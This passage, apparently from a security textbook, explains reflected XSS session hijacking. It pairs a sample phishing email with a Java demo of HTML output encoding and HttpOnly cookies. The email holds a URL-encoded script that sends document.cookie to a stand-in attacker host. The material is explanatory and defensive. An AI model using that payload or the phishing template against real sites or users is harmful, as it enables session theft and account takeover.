craft the URL with JavaScript, known as the XSS payload, and send it to the legitimate user of the site. Upon clicking the malicious link, the attacker's site will be in possession of the session credentials of the particular Web site to which the attacker wants to gain access. It is interesting to note an important point here. The cookies from a particular Web server can only be used to authenticate to the same server/application. Therefore, the attacker cannot simply use his own attacker page to lure individuals into providing session details. The XSS vulnerability in the victim site is used as the weapon by the attacker to obtain the session credentials of the victim Web application. Another interesting point to note here is that the legitimate user's browser executes the malicious JavaScript because it believes that the JavaScript has originated from the legitimate application. The browser does not (apparently) violate the same-origin policy,* and that is why, although the script originates from elsewhere, it is able to gain access to the cookie that has been issued by the legitimate application.
A phishing attack ideally exemplifies this type of attack. The attacker sends the malicious URL containing the XSS payload to the unsuspecting user. Popular Web sites like PayPal and eBay have also been the victims of phishing-based XSS attacks. The attacker sends the user an email saying something along the lines of the following:
From: customer.care@legit-web-application.com
To: unsuspecting.user@emailsite.com
Subject: Account Maintenance activity
Dear User
Application maintenance activity for all the users of legit-web-
application has been scheduled between the 21st and 23rd September 2009.
The next time you login to your account, please click on the following
link to activate the maintenance activity for your account.
https://www.legit-web-application.com/app/errorPage.jsp?infoMessage=%3Csc
ript%3Evar+i%3Dnew+Image%3B+i.src%3D%u201Dhttp%3A//www.i-am-attacker.
com%u201D%252bdocument.cookie%3C/script%3E
Please perform this activity to avoid any disruptions in your service
Regards
Customer Care Team - Legit-Web-Application.
A user would not suspect any foul play based on this email. Firstly, the Web site mentioned in the email is the domain of the legitimate Web application. The user does not realize that an attacker has identified an XSS vulnerability in the legitimate Web application. Moreover, the user is lulled into a false sense of comfort by the presence of https, which means only that the connection is encrypted. Several popular Web sites all over the world, like PayPal and eBay, fell prey to phishing attacks in which XSS vulnerabilities on their Web sites were used to perpetrate session hijacking: their users trusted an email that appeared to come from them, clicked on the link, and thereby caused their session credentials to be transmitted to an attacker.
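The following is an added example, not code from the book, that mirrors the errorPage.jsp pattern in the email above: a page that echoes the infoMessage request parameter straight into its HTML. It contrasts that vulnerable rendering with an HTML-encoded version, and shows the HttpOnly cookie attribute that keeps document.cookie from exposing the session identifier even when a script does run. The class name, method names, the JSESSIONID cookie layout and the sample query string are all assumptions for illustration; the script body in the sample is a harmless stand-in rather than the cookie-stealing payload from the email.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;

/** Added example: reflected XSS in a parameter-echoing error page, and two defensive layers. */
public class ReflectedXssDemo {

    /** Vulnerable rendering (assumed): the untrusted parameter is concatenated into the page unchanged. */
    static String renderVulnerable(String infoMessage) {
        return "<p class=\"info\">" + infoMessage + "</p>";
    }

    /** Encode the characters that change meaning inside HTML text and attribute values. */
    static String htmlEncode(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Hardened rendering: same template, but the untrusted value is encoded before it reaches the HTML. */
    static String renderHardened(String infoMessage) {
        return "<p class=\"info\">" + htmlEncode(infoMessage) + "</p>";
    }

    /** Decode a query string the way the servlet container would before the page reads the parameter. */
    static Map<String, String> parseQuery(String query) {
        Map<String, String> params = new LinkedHashMap<>();
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            String name = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            params.put(URLDecoder.decode(name, StandardCharsets.UTF_8),
                       URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return params;
    }

    /** Second layer (assumed cookie name): HttpOnly keeps document.cookie from reading the session id. */
    static String sessionCookieHeader(String sessionId) {
        return "Set-Cookie: JSESSIONID=" + sessionId + "; Path=/app; Secure; HttpOnly";
    }

    public static void main(String[] args) {
        // Constructed sample: the query string of a link shaped like the one in the phishing email,
        // with a harmless script body in place of the cookie-stealing one.
        String query = "infoMessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E";
        String infoMessage = parseQuery(query).get("infoMessage");

        System.out.println("Decoded parameter : " + infoMessage);
        System.out.println("Vulnerable output : " + renderVulnerable(infoMessage));
        System.out.println("Hardened output   : " + renderHardened(infoMessage));
        System.out.println(sessionCookieHeader("CONSTRUCTED-SESSION-ID"));
    }
}
```

Compiled and run with a plain JDK (no servlet API needed), the vulnerable line prints the decoded script tag inside the paragraph, where a browser would execute it; the hardened line prints the same text as &lt;script&gt;...&lt;/script&gt;, which the browser displays as literal characters. Output encoding at the point of rendering is the fix for the vulnerability itself; the HttpOnly attribute limits the damage of the session-theft scenario in the email if an encoding gap is missed elsewhere in the application.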
The severity of reflected XSS, as can be seen from the above example, is a product of the value of the application: reflected XSS on an informational site may not be as dangerous, or as nefarious in intent, as a reflected XSS vulnerability on an Internet banking Web site. Session credentials being lost to an attacker on an Internet banking site could have disastrous results, where amounts could be transferred and customer identities could be stolen.
* The same-origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin.
Phishing has been defined in Chapter 3.